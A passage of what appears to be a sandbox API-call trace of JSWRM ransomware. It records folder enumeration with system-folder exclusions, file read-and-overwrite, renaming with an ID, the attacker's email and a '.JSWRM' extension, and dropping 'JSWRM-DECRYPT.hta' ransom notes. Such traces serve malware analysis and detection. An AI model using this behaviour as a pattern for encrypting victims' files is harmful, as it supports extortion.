lpDistanceToMoveHigh=0x0) returned 0x0 [0125.757] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.757] CloseHandle (hObject=0x338) returned 1 [0125.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0125.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0125.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0125.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2471d0 [0125.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0125.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0125.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.758] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHT\\PowerViewRes.zh-CHT.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\zh-cht\\powerviewres.zh-cht.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHT\\PowerViewRes.zh-CHT.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\zh-cht\\powerviewres.zh-cht.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0125.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0125.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0125.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0125.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0125.759] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x164159c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x164159c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16461eac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4eb30, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.zh-CHT.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.759] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0125.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0125.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0125.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0125.759] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x164159c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164159c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 0 [0125.759] FindClose (in: hFindFile=0x231e00 | out: hFindFile=0x231e00) returned 1 [0125.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0125.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0125.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0125.759] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PowerPivot Excel Add-in", cAlternateFileName="POWERP~1")) returned 1 [0125.759] lstrcmpiW (lpString1="PowerPivot Excel Add-in", lpString2=".") returned 1 [0125.759] lstrcmpiW (lpString1="PowerPivot Excel Add-in", lpString2="..") returned 1 [0125.759] lstrcmpiW (lpString1="PowerPivot Excel Add-in", lpString2="...") returned 1 [0125.760] lstrcmpiW (lpString1="PowerPivot Excel Add-in", lpString2="windows") returned -1 [0125.760] lstrcmpiW (lpString1="PowerPivot Excel Add-in", lpString2="recovery") returned -1 [0125.760] lstrcmpiW (lpString1="PowerPivot Excel Add-in", lpString2="perflogs") returned 1 [0125.760] lstrcmpiW (lpString1="PowerPivot Excel Add-in", lpString2="documents and settings") returned 1 [0125.760] lstrcmpiW (lpString1="PowerPivot Excel Add-in", lpString2="$RECYCLE.BIN") returned 1 [0125.760] lstrcmpiW (lpString1="PowerPivot Excel Add-in", lpString2="system volume information") returned -1 [0125.760] lstrcmpiW (lpString1="PowerPivot Excel Add-in", lpString2="msocache") returned 1 [0125.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0125.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0125.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0125.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0125.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0125.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0125.760] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\jswrm-decrypt.hta")) returned 0xffffffff [0125.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0125.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0125.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0125.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0125.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0125.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0125.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0125.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0125.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0125.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0125.761] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.761] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0125.762] CloseHandle (hObject=0x238) returned 1 [0125.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0125.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0125.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0125.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0125.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0125.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0125.764] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\jswrm-decrypt.hta")) returned 0x20 [0125.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0125.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0125.765] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x419e194d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232080 [0125.765] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.765] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x419e194d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0125.765] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.765] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.765] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c1a793, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x163ef7bf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x163ef7bf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="ar", cAlternateFileName="")) returned 1 [0125.765] lstrcmpiW (lpString1="ar", lpString2=".") returned 1 [0125.765] lstrcmpiW (lpString1="ar", lpString2="..") returned 1 [0125.765] lstrcmpiW (lpString1="ar", lpString2="...") returned 1 [0125.765] lstrcmpiW (lpString1="ar", lpString2="windows") returned -1 [0125.765] lstrcmpiW (lpString1="ar", lpString2="recovery") returned -1 [0125.765] lstrcmpiW (lpString1="ar", lpString2="perflogs") returned -1 [0125.765] lstrcmpiW (lpString1="ar", lpString2="documents and settings") returned -1 [0125.765] lstrcmpiW (lpString1="ar", lpString2="$RECYCLE.BIN") returned 1 [0125.765] lstrcmpiW (lpString1="ar", lpString2="system volume information") returned -1 [0125.765] lstrcmpiW (lpString1="ar", lpString2="msocache") returned -1 [0125.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0125.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0125.765] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ar\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ar\\jswrm-decrypt.hta")) returned 0xffffffff [0125.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0125.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0125.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0125.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0125.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ar\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ar\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.768] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.768] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.769] CloseHandle (hObject=0x314) returned 1 [0125.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0125.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0125.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0125.770] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ar\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ar\\jswrm-decrypt.hta")) returned 0x20 [0125.770] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ar\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c1a793, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x163ef7bf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41a07ed8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x231d00 [0125.770] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.770] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c1a793, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x163ef7bf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41a07ed8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0125.770] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.770] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.770] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41a07ed8, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x41a07ed8, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x41a07ed8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.771] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x163ef7bf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x163ef7bf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x163ef7bf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12f7, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0125.771] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0125.771] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0125.771] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0125.771] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0125.771] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0125.771] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0125.771] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0125.771] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0125.771] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0125.771] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0125.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241330, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0125.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241178, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0125.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ar\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ar\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.772] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4855) returned 1 [0125.772] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.772] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x12f0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x12f0, lpOverlapped=0x0) returned 1 [0125.774] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.774] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x12f0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x12f0, lpOverlapped=0x0) returned 1 [0125.774] CloseHandle (hObject=0x338) returned 1 [0125.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0125.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0125.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.774] 